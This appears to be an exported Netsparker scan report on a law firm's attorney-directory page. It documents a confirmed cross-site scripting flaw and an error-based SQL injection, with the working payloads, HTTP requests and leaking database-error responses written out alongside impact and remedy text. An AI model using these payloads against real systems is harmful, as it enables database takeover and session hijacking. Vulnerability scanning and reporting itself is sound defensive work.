href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=32" title="Litigation: Data Manage..
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /attorneys.php

/attorneys.php CONFIRMED

http://www.nutter.com/attorneys.php?AttorneyID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
AttorneyID GET '"--></style></script><script>alert(0x000014)</script>

Request

GET /attorneys.php?AttorneyID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000014)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:39:10 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x000014)</script>' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=\'\"--></style></script><script>netsparker(0x000014)</script><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigati..
Database User Has Admin Privileges

Database User Has Admin Privileges

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that the target web site is connecting to the backend database by using a user that has administrative privileges. This issue has been confirmed by checking the connection privileges via an identified SQL Injection vulnerability in the application.

Impact

This can allow an attacker to gain extra privileges via SQL Injection attacks. Here is the list of attacks that the attacker might carry out:
  • Gain full access to the database server.
  • Gain a reverse shell to the database server and execute commands on the underlying operating system.
  • Access the database with full permissions. Where it may be possible to read, update or delete arbitrary data from the database.
  • Furthermore, depending on the platform and the database system user an attacker might carry out a privilege escalation attack to gain administrator access to the target system.

Remedy

Create a database user with the least possible permissions for your application and connect to the database with that user. Always follow the principle of providing the least privileges for all users and applications.

External References

- /attorneys.php

/attorneys.php CONFIRMED

http://www.nutter.com/attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(..

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:11:39 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: Duplicate entry '_!@4dilemma:1' for key 1 | 1062<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a 